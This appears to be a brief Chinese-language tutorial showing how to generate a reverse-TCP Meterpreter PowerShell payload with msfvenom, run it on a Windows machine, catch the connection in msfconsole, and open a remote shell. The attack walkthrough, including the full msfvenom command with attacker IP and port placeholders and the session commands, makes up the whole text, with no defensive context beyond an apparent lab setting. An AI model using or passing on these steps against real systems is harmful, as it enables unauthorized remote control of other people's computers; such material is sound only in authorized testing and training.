一、使用工具kali linux,windows severe msfvenom msfconsole
二、使用msfvenom生成ps1格式的Powershell腳本
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=XXXXX(你自己kali本機IP) LPORT=XXXX(自己隨便設置) -f psh-reflection >xxx.ps1
將生成的Powershell腳本下載並上傳至windows機器中
三、啟動Msfconsole
選擇模塊
設置payload
設置完成后執行run
在windows機器中執行powershell腳本,此時攻擊機器中會顯示如果下結果
如果攻擊主機中顯示通道已經建立但是未拿到相應的shell 如圖:
回車進入:
msf exploit(handler)>
輸入:sessions -l 查看信息
輸入 seeions 1 就會拿到想要的meterpreter
在meterpreter中輸入shell 即可拿到相應的shell
后續可以操作 一些相關命令。